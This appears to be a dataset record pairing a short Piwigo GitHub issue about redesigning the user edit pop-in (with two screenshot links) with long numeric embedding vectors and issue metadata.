0.01933298446238041, 0.004308315925300121, -0.005618697497993708, -0.0017312975833192468, -0.01689108833670616, -0.016113413497805595, 0.012209488078951836, -0.006260278634727001, 0.0002668395172804594, 0.034342098981142044, -0.0222103800624609, 0.02406124584376812, 0.005805339198559523, -0.0081266975030303, 0.012668315321207047, 0.02955162711441517, -0.00536595331504941, -0.0027529674116522074, -0.00019296046230010688, -0.021137189120054245, -0.0007805906352587044, 0.00227664178237319, -0.007014622911810875, -0.011960632167756557, -0.012217264622449875, 0.01598898507654667, 0.005521487910300493, -0.026518696919083595, -0.026332054287195206, 0.027949616312980652, 0.019286325201392174, 0.024947794154286385, -0.019908463582396507, 0.032755643129348755, -0.01133849285542965, 0.005972539074718952, -0.016704445704817772, -0.0003351290652062744, -0.00459605548530817, -0.008686622604727745, 0.011042975820600986, 0.02981603518128395, -0.002624650951474905, -0.008655515499413013, 0.012505004182457924, -0.01664223149418831, -0.016471143811941147, 0.0020783348008990288, 0.003921423107385635, -0.015903441235423088, 0.0019111348083242774, 0.02322135679423809, -0.0005463162669911981, 0.0035364741925150156, 0.0072090416215360165, 0.032289039343595505, 0.0018285069381818175, -0.00909879058599472, 0.003569525433704257, -0.012341692112386227, -0.008391106501221657, -0.02378128282725811, -0.014285878278315067, 0.011548464186489582, -0.009230994619429111, 0.0018557255389168859, -0.021790435537695885, 0.0004977115895599127, 0.0003137430176138878, 0.016595570370554924, 0.013274901546537876, 0.024932241067290306, 0.0013463487848639488, -0.004214995075017214, 0.013601524755358696, 0.019846249371767044, -0.01207728311419487, -0.011626232415437698, 0.00919988751411438, -0.012948278337717056, -0.008569971658289433, -0.017948724329471588, 0.007294585462659597, -0.005455385893583298, -0.01568569242954254, -0.017870957031846046, 0.0023233022075146437, 0.006956297438591719, 0.0026596463285386562, -0.010203087702393532, -0.008196688257157803, 0.000706225517205894, -0.007072948385030031, -0.0030659812036901712, 0.0124505665153265, -0.00002490988299541641, -0.0008899511303752661, -0.005280409008264542, -0.0034839811269193888, -0.012279478833079338, -0.00019125928520224988, -0.006590790580958128, -0.002105553401634097, -0.03807493671774864, 0.005984204355627298, -0.02675199881196022, 0.012652762234210968, 0.01979959011077881, 0.006287497468292713, 0.008958809077739716, 0.016300054267048836, -0.005614809226244688, -0.0015835394151508808, -0.00030037673423066735, 0.002677144017070532, 0.018461989238858223, 0.005817004479467869, -0.0061086323112249374, 0.0029298882000148296, 0.020110659301280975, -0.012971608899533749, 0.022630324587225914, 0.01430920884013176, -0.006719106808304787, 0.013344892300665379, 0.013259348459541798, 0.00422666035592556, 0.0043705301359295845, 0.027825189754366875, -0.019908463582396507, 0.007788409013301134, 0.003931143786758184, 0.015304631553590298, 0.0037853301037102938, 0.0203439611941576, 0.0010109767317771912, -0.028276240453124046, -0.004914902150630951, -0.012613878585398197, 0.003925311379134655, 0.0015047999331727624, -0.009440966881811619, 0.025569934397935867, 0.0008010045858100057, -0.004075013566762209, 0.0033964929170906544, -0.0026713113766163588, 0.01875750534236431, 0.011229618452489376, -0.015250194817781448, 0.009619832038879395, 0.02174377627670765, 0.0013910650741308928, 0.025149989873170853, 0.00654801819473505, -0.008904371410608292, -0.0008389162248931825, 0.0000020960753772669705, -0.025678807869553566, 0.03213350474834442, 0.01011754386126995, -0.004358864855021238, -0.0016642231494188309, -0.01970626786351204, 0.009557617828249931, 0.0064702508971095085, -0.017404353246092796, 0.004957674071192741, -0.020686138421297073, 0.0055253766477108, 0.02925611101090908, -0.024745598435401917, -0.0069679622538387775, -0.014806919731199741, -0.005004334729164839, -0.02099720761179924, -0.00197432073764503, -0.006497469265013933, -0.0108174504712224, -0.005498157814145088, -0.015615701675415039, -0.013531534001231194, -0.016051199287176132, 0.0075434413738548756, -0.01692219451069832, 0.0065207998268306255, 0.03177577629685402, -0.02471449226140976, 0.006761878728866577, 0.03337778523564339, -0.028649523854255676, 0.014620278030633926, 0.0009711208986118436, -0.01830645464360714, 0.0181198138743639, 0.00845332071185112, -0.006229171995073557, -0.014013692736625671, 0.0021230510901659727, -0.014659161679446697, 0.0033964929170906544, -0.011882864870131016, -0.0012724697589874268, 0.003979748580604792, 0.008196688257157803, -0.0036414603237062693, -0.00001404218710376881, -0.004172223154455423, 0.005517599638551474, -0.024963347241282463, 0.03847932815551758, -0.0027899069245904684, 0.023812389001250267, 0.01773097552359104, -0.004164446145296097, -0.011167404241859913, -0.0037522788625210524, 0.004953785799443722, -0.008095590397715569, 0.026627570390701294, -0.03791940212249756, -0.007142939139157534, -0.007356799673289061, 0.001499939477071166, 0.006789097096771002, 0.008002269081771374, -0.007247925270348787, -0.019379645586013794, -0.01875750534236431, 0.0046077207662165165, 0.004638827871531248, 0.02667423151433468, -0.012753860093653202, -0.003435376565903425, 0.0001043177253450267, 0.017995385453104973, 0.005311516113579273, 0.008437766693532467, -0.015600147657096386, 0.01105852983891964, -0.004160557873547077, 0.012839403934776783, -0.0018878045957535505, 0.0035792463459074497, 0.011859534308314323, 0.024496743455529213, -0.02768520824611187, 0.01997067779302597, -0.005941432435065508, -0.01692219451069832, 0.0027918510604649782, -0.007667869329452515, 0.03760833293199539, 0.010257525369524956, 0.004397748503834009, 0.0026188185438513756, -0.0041566696017980576, -0.023625748232007027, -0.018835272639989853, 0.01735769212245941, -0.000494795327540487, -0.012256148271262646, 0.0006590790580958128, -0.021588239818811417, -0.0007713557570241392, -0.0064430320635437965, -0.00018044475291389972, -0.011875087395310402, 0.022085951641201973, 0.015530156902968884, -0.001071246457286179, -0.0036278509069234133, -0.02342355251312256, 0.005093767307698727, 0.0024807811714708805, 0.024916687980294228, -0.014752482995390892, -0.0031884650234133005, 0.01240390632301569, 0.01212394330650568, 0.022319255396723747, -0.005762567277997732, 0.03222682699561119, 0.0012909395154565573, -0.01877306029200554, 0.004619385581463575, -0.010016446001827717, 0.006334157660603523, 0.02600543200969696, -0.022785859182476997, -0.022708091884851456, 0.015226864255964756, 0.03511977568268776, 0.011074082925915718, 0.02766965515911579, 0.0008019767119549215, -0.006030865013599396, 0.0005920046241953969, 0.006271943915635347, -0.0006585929659195244, -0.02025064080953598, -0.021961525082588196, 0.0030270975548774004, -0.003857264993712306, -0.00325067900121212, -0.008429990150034428, -0.0066335625015199184, 0.01783985085785389, -0.007162380963563919, -0.0057314601726830006, -0.009604278951883316, 0.00303292996250093, -0.012326139025390148, 0.0101719805970788, 0.0053465114906430244, -0.0024516184348613024, 0.011906194500625134, -0.01495467871427536, 0.01645559072494507, 0.018741952255368233, 0.0017750418046489358, 0.013959255069494247, -0.003820325480774045, -0.02359464019536972, -0.0108174504712224, -0.015460167080163956, 0.023641301319003105, 0.005712018348276615, 0.019628500565886497, -0.00808781385421753, 0.003907813690602779, 0.0008549557533115149, 0.026534250006079674, -0.010304185561835766, -0.018322007730603218, 0.009347645565867424, -0.004514399915933609, 0.026829766109585762, -0.0012452510418370366, -0.01773097552359104, -0.0009730650926940143, 0.011354045942425728, 0.007321804296225309, 0.0011577627155929804, 0.018835272639989853, 0.01821313425898552, -0.002504111500456929, 0.013033822178840637, -0.00010103691602125764, 0.01819758117198944, 0.0020899998489767313, 0.005715906620025635, -0.0048215813003480434, -0.01532018557190895, 0.016844427213072777, 0.03502645343542099, -0.012240594252943993, 0.012536111287772655, -0.012372799217700958, -0.005801450926810503, -0.003553971881046891, -0.011735106818377972, 0.015242418274283409, 0.011112966574728489, -0.0007805906352587044, -0.01213171985000372, 0.004487181082367897, 0.012178380973637104, 0.0011460976675152779, 0.00877994392067194, -0.014752482995390892, 0.023641301319003105, 0.0026207626797258854, 0.01133849285542965, 0.037950508296489716, 0.009767590090632439, -0.011330715380609035, -0.007508445996791124, 0.02249034307897091, -0.0046582696959376335, -0.007127385586500168, -0.008204464800655842, -0.0075434413738548756, 0.01804204471409321, 0.027918510138988495, 0.020483942702412605, 0.00617862306535244, -0.011408482678234577, -0.025041114538908005, 0.0081266975030303, -0.009682046249508858, 0.008297785185277462, 0.006026976276189089, 0.008997692726552486, -0.017139943316578865, 0.027063068002462387, 0.0022047068923711777, -0.019628500565886497, 0.011291831731796265, 0.001780874328687787, -0.004242213908582926, 0.0004469197301659733, -0.025414397940039635, 0.00186933483928442, 0.01370262261480093, 0.0010770789813250303, 0.009993115440011024, 0.0043938602320849895, -0.0299249105155468, 0.019924016669392586, 0.0010877720778807998, 0.0012802464189007878, 0.0027704648673534393, -0.007702864706516266, 0.013018269091844559, -0.004417190328240395, -0.01857086457312107, -0.0009215441532433033, 0.006901860237121582, 0.0016574185574427247, 0.0035286974161863327, -0.0059958696365356445, -0.003882539225742221, -0.0216349009424448, 0.02732747793197632, -0.015460167080163956, 0.008406659588217735, 0.012310585007071495, -0.032662324607372284, 0.015584594570100307, 0.019193002954125404, 0.017046622931957245, -0.0024107906501740217, -0.020141765475273132, 0.02731192484498024, 0.005171534605324268, 0.019721822813153267, 0.005976427812129259, 0.007916725240647793, -0.01735769212245941, 0.015942323952913284, -0.012341692112386227, 0.014612501487135887, 0.0108174504712224, 0.0002925999870058149, -0.007489004172384739, -0.00849220436066389, 0.009588724933564663, -0.006361376494169235, -0.0027762975078076124, -0.018633078783750534, 0.0097598135471344, 0.007628985680639744, -0.017622102051973343, 0.010195311158895493, 0.004732148721814156, -0.005599255673587322, 0.006555795203894377, -0.0004077930061612278, 0.0008661348256282508, 0.004316092934459448, -0.005202641710639, -0.023361338302493095, 0.001315241795964539, -0.009028799831867218, 0.008321115747094154, -0.006003646180033684, 0.020032892003655434, -0.0008743976359255612, -0.009347645565867424, -0.013827050104737282, -0.0081266975030303, 0.012053952552378178, 0.0006931023090146482, -0.012940501794219017, 0.010902995243668556, 0.010786343365907669, 0.00557203684002161, -0.00227664178237319, 0.0032467904966324568, 0.022505896165966988, -0.008842158131301403, -0.0087721673771739, -0.004444409161806107, -0.004806027747690678, -0.01406812947243452, -0.01109741348773241, -0.0031534696463495493, 0.01989291049540043, -0.014892464503645897, -0.00666855787858367, -0.015250194817781448, 0.007597878575325012, 0.019721822813153267, -0.006983515806496143, -0.0006459557916969061, -0.016859980300068855, 0.011960632167756557, 0.007407348603010178, -0.0053192926570773125, -0.0043433113023638725, -0.012784967198967934, -0.006796874105930328, -0.02118385024368763, -0.006886306684464216, 0.01044416707009077, -0.0012724697589874268, 0.008227795362472534, 0.012279478833079338, 0.005152092780917883, -0.006940743885934353, -0.006524688098579645, -0.014620278030633926, -0.016580017283558846, -0.011004092171788216, 0.01244278997182846, -0.015825673937797546, 0.015825673937797546, 0.012318362481892109, -0.00633804639801383, -0.009363199584186077, 0.001943213865160942, 0.014526957646012306, 0.0077067529782652855, -0.0005521487910300493, 0.026347607374191284, -0.01338377594947815, 0.00002513771687517874, -0.00374061381444335, -0.03474649041891098, 0.011245171539485455, -0.0009239743812941015, -0.026736445724964142, -0.017855403944849968, 0.0016953301383182406, 0.002247479045763612, -0.001751711592078209, -0.024745598435401917, 0.02314358949661255, 0.012606102041900158, 0.025041114538908005, -0.017062176018953323, -0.017482120543718338, -0.011735106818377972, 0.03521309420466423, 0.00014156104589346796, 0.0010819394374266267, 0.0209194403141737, 0.009075460024178028, -0.0101719805970788, 0.01402924582362175, 0.001418283674865961, -0.012979385443031788, -0.023672407492995262, -0.010273078456521034, 0.0015086883213371038, -0.027545226737856865, 0.019021915271878242, 0.015670139342546463, 0.018446436151862144, 0.0056575811468064785, -0.006769655272364616, 0.006392483599483967, -0.011455143801867962, 0.006524688098579645, 0.012092836201190948, -0.0027218603063374758, -0.006011422723531723, 0.006435255520045757, 0.005863664671778679, 0.006003646180033684, -0.001130544114857912, 0.014573617838323116, -0.00985313393175602, 0.008663292974233627, 0.0236101932823658, -0.006038641557097435, 0.02193041704595089, 0.013391552492976189, 0.021432705223560333, -0.003466483438387513, 0.006256390362977982, -0.01528907846659422, -0.009122120216488838, 0.017979832366108894, 0.015444613061845303, 0.012372799217700958, -0.012217264622449875, -0.007002957630902529, -0.0019247441086918116, 0.0013113534078001976, 0.04302094504237175, -0.0010090324794873595, 0.014488073997199535, -0.0035286974161863327, 0.008352222852408886, -0.016564464196562767, 0.011081859469413757, 0.020359516143798828, -0.01013309694826603, -0.03325335681438446, 0.002751023042947054, 0.019535180181264877, 0.013679292052984238, -0.01267609279602766, -0.027436351403594017, 0.01342265959829092, -0.006536353379487991, -0.0026343718636780977, 0.0024943905882537365, 0.014915794134140015, -0.017824295908212662, -0.0077845207415521145, -0.00459605548530817, 0.0038164369761943817, 0.010195311158895493, -0.0056303623132407665, 0.018835272639989853, 0.01276941318064928, -0.003956418484449387, -0.008227795362472534, 0.006536353379487991, 0.005066548474133015, -0.013134920038282871, 0.0001781360333552584, 0.01114407368004322, -0.011602901853621006, 0.008803273551166058, 0.010537487454712391, 0.022614771500229836, -0.0010838836897164583, -0.012178380973637104, -0.00045226624934002757, -0.004199441522359848, 0.010327516123652458, -0.0108174504712224, 0.017062176018953323, 0.012512780725955963, 0.006812427658587694, 0.013321561738848686, -0.002914334647357464, -0.006151404231786728, -0.00034557905746623874, 0.0011179068824276328, 0.006567460019141436, 0.009612055495381355, -0.0014280045870691538, 0.030858119949698448, 0.02137049101293087, 0.013881487771868706, 0.010304185561835766, -0.0008500952972099185, 0.01267609279602766, -0.006365264765918255, 0.008352222852408886, -0.0036842324770987034, 0.015569041483104229, 0.026238733902573586, 0.01211616676300764, -0.014433636330068111, 0.024932241067290306, 0.009938678704202175, 0.016859980300068855, 0.0032915067858994007, 0.003186520654708147, -0.024963347241282463, 0.003907813690602779, -0.00703795300796628, 0.026083199307322502, -0.0133293392136693, -0.01077856682240963, -0.008531088009476662, -0.006754102185368538, -0.002507999772205949, 0.04582057520747185, 0.002385516185313463, -0.02323690988123417, -0.0029162790160626173, 0.009658715687692165, -0.0005628418293781579, 0.002535218372941017, 0.03431099280714989, -0.010833004489541054, 0.025709914043545723, 0.0019354370888322592, -0.008624408394098282, 0.011167404241859913, 0.008562195114791393, 0.00184017198625952, 0.0010168092558160424, 0.035524167120456696, 0.015833450481295586, -0.017886510118842125, 0.006229171995073557, -0.013648184947669506, -0.0016914417501538992, 0.017326585948467255, 0.012590548023581505, 0.0013939812779426575, -0.007185711059719324, -0.014884687960147858, -0.0157167986035347, -0.02460561692714691, -0.012193934060633183, 0.004724371712654829, -0.006411925423890352, 0.0007961441297084093, -0.024185672402381897, -0.020126212388277054, -0.016191180795431137, -0.008686622604727745, -0.01662667840719223, -0.012287255376577377, 0.012295031920075417, -0.026876427233219147, -0.004094455391168594, -0.0043938602320849895, 0.01634671539068222, 0.0015261860098689795, -0.0064469208009541035, -0.016128966584801674, -0.011237394995987415, -0.005723683629184961, 0.004102232400327921, -0.01013309694826603, 0.00873328372836113, -0.00984535738825798, 0.0077339718118309975, 0.01045194361358881, 0.013204910792410374, -0.001457167323678732, 0.022412575781345367, 0.028478436172008514, 0.0010858278255909681, -0.0008058651001192629, 0.03177577629685402, 0.0012676091864705086, 0.009215441532433033, 0.019021915271878242, -0.02602098509669304, -0.022785859182476997, -0.0075201112776994705, -0.002807404613122344, 0.008678846061229706, 0.01175065990537405, 0.0017332417191937566, 0.006077525205910206, 0.010156427510082722, -0.0015796510269865394, 0.010941878892481327, 0.015133542940020561, 0.0015932603273540735, -0.00044521858217194676, -0.011027422733604908, 0.008375553414225578, -0.03735947608947754, 0.015537934377789497, 0.008569971658289433, 0.009316539391875267, -0.0059686508029699326, -0.027280816808342934, 0.010296409018337727, -0.00850775744765997, 0.019208557903766632, -0.009332092478871346, -0.0023388557601720095, -0.021230511367321014, 0.01801093854010105, 0.004883795045316219, -0.005591478664427996, -0.017497673630714417, 0.006423590239137411, 0.02258366346359253, -0.011136297136545181, -0.010895217768847942, 0.006135850679129362, 0.028913933783769608, 0.004502734635025263, -0.01645559072494507, 0.020779458805918694, -0.01542128250002861, 0.011532911099493504, 0.009783144108951092, -0.004774920642375946, 0.006439143791794777, 0.0007125441334210336, -0.009814250282943249, -0.008694399148225784, -0.0006785208825021982, -0.0075434413738548756, 0.010957431979477406, -0.030904779210686684, 0.002630483591929078, -0.009697599336504936, 0.016393376514315605, 0.01709328219294548, 0.01885082758963108, 0.00873328372836113, -0.016517803072929382, -0.016144519671797752, 0.0004216453235130757, 0.002807404613122344, -0.0168288741260767, 0.012022845447063446, -0.0077806320041418076, 0.003612297587096691, 0.02944275178015232, 0.004809916019439697, 0.05313071236014366, 0.010980762541294098, -0.015654584392905235, -0.016595570370554924, 0.011859534308314323, -0.006085302215069532, 0.0069446321576833725, -0.025103328749537468, -0.01402924582362175, -0.0021172184497117996, -0.01692219451069832, -0.013943701982498169, 0.004452185705304146, -0.005089879035949707, -0.01244278997182846, -0.00013026046508457512, 0.006637450773268938, -0.003865041770040989, -0.00211527431383729, -0.01211616676300764, -0.0005181255401112139, 0.0011227673385292292, 0.002727692946791649, 0.018881933763623238, 0.01406812947243452, 0.009643162600696087, 0.0053426227532327175, -0.0035792463459074497, 0.012987161986529827, -0.023625748232007027, 0.025149989873170853, -0.005933655425906181, 0.004739925265312195, 0.005078213755041361, 0.01045194361358881, -0.0021036092657595873, -0.009448743425309658, 0.02751411870121956, 0.0003353720821905881, -0.042398806661367416, -0.002476892899721861, -0.001994734862819314, -0.020017338916659355, -0.004187776707112789, -0.0017721254844218493, -0.0008534976514056325, -0.006423590239137411, -0.012621655128896236, 0.02284807339310646, 0.001921827788464725, -0.03011155128479004, 0.016128966584801674, -0.03356442600488663, 0.01959739439189434, -0.014239218086004257, 0.004203329794108868, -0.006050306838005781, 0.005295962560921907, -0.00817335769534111, -0.0051093208603560925, -0.00975203700363636, -0.009573171846568584, -0.005879218224436045, 0.00014350522542372346, -0.006458585616201162, 0.005712018348276615, 0.007788409013301134, 0.01105852983891964, -0.016704445704817772, -0.0014542511198669672, 0.00012977441656403244, 0.0020880557131022215, -0.00027315813349559903, 0.014565841294825077, -0.0126838693395257, -0.01267609279602766, 0.02591210976243019, -0.0045843906700611115, 0.020779458805918694, 0.013788166455924511, -0.004914902150630951, 0.012209488078951836, -0.0004454615991562605, -0.000029709592126891948, 0.003872818313539028, -0.02127717062830925, -0.012559440918266773, 0.013943701982498169, 0.009962008334696293, 0.011019646190106869, -0.004168334882706404, 0.00841443706303835, -0.021945970132946968, 0.0022435905411839485, -0.009005469270050526, 0.0005317348404787481, 0.008857711218297482, 0.0059453207068145275, -0.0006396371754817665, 0.005715906620025635, -0.006190287880599499, 0.007006846368312836, -0.021043868735432625, 0.009744259528815746, 0.021417152136564255, -0.009495404548943043, -0.01049082726240158, -0.02572546899318695, 0.009884241037070751, 0.01277718972414732, 0.00813447404652834, 0.010809673927724361, -0.022832520306110382, 0.0006095023127272725, 0.005513711366802454, 0.006594678852707148, -0.013850380666553974, 0.009370976127684116, 0.015841227024793625, -0.005381506867706776, -0.016968855634331703, 0.003814492840319872, 0.003044595243409276, 0.014060352928936481, -0.011081859469413757, -0.002469116123393178, 0.005774232093244791, 0.013959255069494247, 0.0011665115598589182, 0.017528779804706573, -0.01110519003123045, -0.003814492840319872, -0.0030698697082698345, 0.009954231791198254, 0.01577901281416416, 0.02062392421066761, 0.014480296522378922, 0.0005536069511435926, 0.013718175701797009, -0.005439832340925932, -0.015639031305909157, 0.02063947729766369, 0.01082522701472044, -0.009013245813548565, -0.009635385125875473, -0.0007669813348911703, -0.00638470659032464, -0.010661915875971317, 0.004588278941810131, -0.018461989238858223, -0.0035286974161863327, 0.008383329957723618, 0.015639031305909157, -0.017575440928339958, -0.00146397203207016, 0.012536111287772655, 0.015957878902554512, 0.01463583204895258, -0.005914213601499796, 0.010638585314154625, 0.0043938602320849895, -0.008266679011285305, -0.003598688170313835, 0.018088705837726593, -0.003215683624148369, 0.01867973804473877, -0.0010245860321447253, 0.0021386046428233385, -0.0076834228821098804, -0.0037425579503178596, -0.003147637005895376, 0.00030183486524038017, 0.0010148651199415326, 0.006252502091228962, 0.00919988751411438, 0.0190530214458704, 0.004669934511184692, 0.004397748503834009, -0.004965451080352068, 0.02768520824611187, 0.02417011931538582, -0.008904371410608292, -0.027934063225984573, 0.00459605548530817, -0.002334967255592346, 0.01735769212245941, -0.024496743455529213, -0.014830250293016434, 0.006007534451782703, -0.002039451152086258, 0.0028968369588255882, -0.021805990487337112, 0.022645877674221992, -0.00020085870346520096, 0.016284501180052757, 0.00671521807089448, 0.0014017580542713404, -0.02099720761179924, 0.02555437944829464, -0.019659608602523804, -0.006236948538571596, -0.007971161976456642, 0.006400260142982006, 0.02906946837902069 ]
null
null
null
null
null
null
null
null
null
[ "Piwigo", "Piwigo" ]
We are currently updating the interface for the user edit pop-in to enhance usability and integrate additional features. ![new pop in user](https://github.com/Piwigo/Piwigo/assets/137212265/fdd179dc-adcd-4108-9039-5703ff76e775) ![Capture d’écran 2024-05-10 à 18 06 08](https://github.com/Piwigo/Piwigo/assets/137212265/0068708b-4efd-4912-97d0-8ee0082d81bc)
[Users] New user edit pop in
https://api.github.com/repos/Piwigo/Piwigo/issues/2158/comments
2
2024-05-10T16:07:09
2024-07-01T13:05:46Z
https://github.com/Piwigo/Piwigo/issues/2158
2,290,006,831
2,158
false
This is a GitHub Issue repo:Piwigo owner:Piwigo Title : [Users] New user edit pop in Issue date: --- start body --- We are currently updating the interface for the user edit pop-in to enhance usability and integrate additional features. ![new pop in user](https://github.com/Piwigo/Piwigo/assets/137212265/fdd179dc-adcd-4108-9039-5703ff76e775) ![Capture d’écran 2024-05-10 à 18 06 08](https://github.com/Piwigo/Piwigo/assets/137212265/0068708b-4efd-4912-97d0-8ee0082d81bc) --- end body ---
503
[ -0.041250862181186676, 0.018062876537442207, -0.004714942071586847, 0.007601721212267876, 0.011961187236011028, -0.006527480203658342, 0.017125356942415237, 0.055688660591840744, -0.0012519792653620243, -0.006054813973605633, 0.018312882632017136, -0.04775099828839302, 0.015765953809022903, 0.003341866657137871, 0.0003081118920817971, 0.0036621857434511185, -0.045032188296318054, 0.004718848504126072, 0.01239869650453329, -0.029875623062253, -0.029219359159469604, -0.03712577372789383, -0.014031542465090752, 0.01956290751695633, 0.02117231674492359, 0.007343903183937073, 0.0032930374145507812, 0.016765974462032318, 0.0025391154922544956, 0.007332184351980686, 0.013070585206151009, 0.018359757959842682, -0.005988406483083963, 0.009906456805765629, 0.031563159078359604, -0.024141129106283188, 0.03921956941485405, 0.06015750393271446, -0.008500177413225174, 0.037625785917043686, 0.004433686379343271, -0.03571949526667595, 0.01826600544154644, 0.028125587850809097, -0.007039209362119436, -0.03126627579331398, 0.006562637165188789, 0.00954707432538271, -0.01931290328502655, 0.041750870645046234, 0.03187566623091698, -0.02493802085518837, 0.0017451535677537322, 0.008164232596755028, -0.01013302430510521, -0.0263286754488945, 0.006004031747579575, -0.01475812029093504, -0.005925904959440231, -0.02679743431508541, -0.004175868351012468, 0.0040157088078558445, 0.014039355330169201, 0.020984813570976257, 0.001472686999477446, 0.03450072184205055, -0.031438156962394714, 0.010804913006722927, -0.005125106777995825, 0.03203191980719566, 0.04206337779760361, 0.0538761243224144, 0.03218817338347435, 0.011633055284619331, -0.003918050322681665, 0.025953667238354683, 0.07212650775909424, -0.026172421872615814, -0.017703494057059288, -0.03603200241923332, -0.024609887972474098, 0.04925102740526199, -0.014781558886170387, 0.002732479013502598, 0.00450790673494339, -0.020328549668192863, -0.002888732124119997, -0.08181420713663101, 0.002732479013502598, 0.004336027894169092, 0.010015834122896194, -0.004621190018951893, -0.041625868529081345, -0.02890685386955738, 0.004761818330734968, -0.029906874522566795, 0.022437969222664833, 0.008054855279624462, -0.0015508136712014675, 0.016094086691737175, 0.003769609844312072, -0.028641222044825554, -0.0006923972396180034, 0.0029414675664156675, 0.03793829306960106, 0.03293818607926369, 0.05678243562579155, -0.02856309711933136, -0.015469073317945004, 0.03637576103210449, 0.023859873414039612, -0.0021973114926368, -0.054844893515110016, 0.01064865943044424, -0.003341866657137871, 0.0292818620800972, -0.004382904153317213, -0.026063043624162674, 0.0003020082658622414, 0.009820517152547836, 0.012789329513907433, -0.01698472909629345, -0.030281882733106613, 0.0339694581925869, -0.02131294459104538, 0.025094274431467056, -0.011375237256288528, 0.023141108453273773, 0.00682436116039753, -0.010320527479052544, -0.020312923938035965, 0.038125794380903244, 0.005433707032352686, -0.005675899796187878, 0.032344426959753036, 0.03815704584121704, -0.0007202298729680479, 0.007504062727093697, 0.005375112406909466, 0.03953207656741142, -0.0251724012196064, -0.028406843543052673, 0.015695640817284584, -0.0042266505770385265, -0.0561886727809906, 0.02623492293059826, -0.0042266505770385265, -0.03487572818994522, -0.005992312449961901, 0.057063691318035126, -0.005125106777995825, -0.034969478845596313, 0.01664097234606743, 0.022500470280647278, 0.04296964779496193, -0.019016021862626076, -0.02223483845591545, 0.02257859706878662, -0.03418821468949318, 0.02223483845591545, -0.046282216906547546, -0.006031375844031572, 0.006855611689388752, 0.007004052400588989, -0.016765974462032318, -0.05093856155872345, -0.017390988767147064, 0.006004031747579575, 0.030875643715262413, 0.013375279493629932, -0.009875206276774406, -0.020312923938035965, -0.012554949149489403, -0.0051212008111178875, -0.029641244560480118, 0.011922123841941357, 0.009875206276774406, -0.0027188067324459553, -0.037063274532556534, -0.04984479025006294, -0.03068814054131508, -0.010812725871801376, -0.02573491260409355, -0.02378174662590027, 0.031672537326812744, -0.045938458293676376, 0.018672265112400055, -0.006254036910831928, 0.014961250126361847, -0.04168837144970894, 0.04028208926320076, 0.01651597023010254, 0.006703265011310577, -0.021047314628958702, 0.026844309642910957, -0.007949384860694408, -0.026531804352998734, -0.007812662981450558, 0.019828539341688156, -0.013312777504324913, 0.025828663259744644, -0.014719056896865368, -0.0456572026014328, -0.03840705007314682, -0.02082855999469757, 0.035750746726989746, 0.012836205773055553, 0.007593908347189426, -0.03971957787871361, -0.04709473252296448, -0.0031074867583811283, -0.0012646748218685389, 0.012367445975542068, 0.00825017224997282, -0.019719161093235016, 0.02529740333557129, -0.0066134193912148476, -0.036594513803720474, 0.018562886863946915, -0.007773599587380886, -0.001941446796990931, 0.004750099033117294, 0.010742411948740482, -0.026828685775399208, -0.02164107747375965, 0.011937749572098255, -0.007687660399824381, 0.027078690007328987, -0.004921977873891592, 0.02342236414551735, 0.026844309642910957, -0.0004047935944981873, 0.0281099621206522, 0.0037051555700600147, 0.01042990479618311, -0.02351611666381359, -0.013023708947002888, -0.015469073317945004, -0.0044844686053693295, 0.003472728654742241, 0.007777506019920111, 0.028063084930181503, -0.03993833437561989, -0.008851747028529644, 0.0339069589972496, 0.06662639230489731, 0.01734411157667637, 0.031078774482011795, 0.010945540852844715, 0.0027051346842199564, 0.026063043624162674, 0.023922374472022057, -0.020797308534383774, -0.0114143006503582, 0.005644649267196655, -0.005863403435796499, 0.016437843441963196, 0.017609743401408195, -0.002837949898093939, -0.005793089512735605, 0.008179858326911926, 0.014304986223578453, -0.015765953809022903, 0.02435988374054432, 0.004113367293030024, -0.06109502539038658, 0.05534490570425987, -0.007484531030058861, 0.003296943847090006, -0.05000104382634163, 0.00954707432538271, 0.008547053672373295, 0.0022754380479454994, 0.00031030920217745006, -0.008812683634459972, 0.03243817761540413, 0.0076212529093027115, 0.021375445649027824, 0.03359445184469223, 0.02587554045021534, 0.004293058533221483, 0.019031647592782974, 0.011039293371140957, -0.008445489220321178, -0.0030879550613462925, 0.00588684156537056, -0.018641013652086258, -0.023375488817691803, -0.004195400048047304, 0.031188150867819786, -0.020922312512993813, 0.025844288989901543, -0.036000750958919525, -0.01604720950126648, 0.03590700030326843, 0.014125294983386993, -0.021719204261898994, 0.01978166215121746, -0.044313423335552216, -0.021109815686941147, 0.020047293975949287, -0.005004010628908873, -0.06506385654211044, 0.016719099134206772, 0.01257838774472475, 0.028766226023435593, 0.01564876362681389, 0.07768911868333817, -0.014297173358500004, -0.008968937210738659, 0.04978228732943535, -0.03312569111585617, 0.005273547489196062, -0.043157149106264114, 0.01200806349515915, 0.012414321303367615, 0.01792224869132042, 0.01814100332558155, 0.0228286013007164, -0.03684451803565025, -0.058126214891672134, 0.00936738308519125, -0.048751018941402435, -0.027109941467642784, 0.009109565056860447, 0.0003972250851802528, -0.011867435649037361, -0.014515927992761135, 0.01979728788137436, 0.004281339235603809, -0.006207160651683807, -0.03884455934166908, 0.010258026421070099, -0.015180004760622978, -0.020219171419739723, -0.02798496000468731, 0.04462593048810959, 0.038219548761844635, -0.021281694993376732, 0.0009301952086389065, 0.0020351987332105637, -0.014078418724238873, -0.023859873414039612, -0.009242380037903786, 0.019594158977270126, -0.005582147743552923, 0.030656889081001282, -0.0240161269903183, 0.038125794380903244, -0.017156608402729034, 0.0009370312909595668, -0.01564876362681389, 0.01364872232079506, 0.05206358805298805, 0.020516052842140198, 0.02493802085518837, 0.04856351390480995, -0.008648618124425411, -0.004984478931874037, -0.028969354927539825, 0.024328632280230522, -0.03375070542097092, -0.007554845418781042, -0.0035977312363684177, 0.014867497608065605, 0.009461134672164917, -0.02904748171567917, -0.008890810422599316, -0.007840007543563843, -0.01446123979985714, -0.005875122733414173, 0.021719204261898994, -0.07231400907039642, 0.01497687492519617, -0.035063233226537704, 0.05681368708610535, -0.013078398071229458, 0.008890810422599316, -0.03192254155874252, 0.02821933850646019, -0.014531553722918034, -0.028766226023435593, -0.044657181948423386, 0.007968916557729244, 0.05434488505125046, -0.02387549914419651, 0.01696910336613655, 0.012742453254759312, 0.0445009283721447, -0.0014199515571817756, -0.00465634698048234, 0.01427373569458723, 0.002177779795601964, -0.05512614920735359, -0.01421904657036066, 0.011703369207680225, -0.0004924419336020947, -0.033188194036483765, -0.010750224813818932, 0.015711264684796333, -0.006422008853405714, -0.045625951141119, -0.003781328909099102, 0.02854747138917446, 0.018359757959842682, -0.011742432601749897, 0.030391259118914604, -0.006160284858196974, 0.01334402896463871, 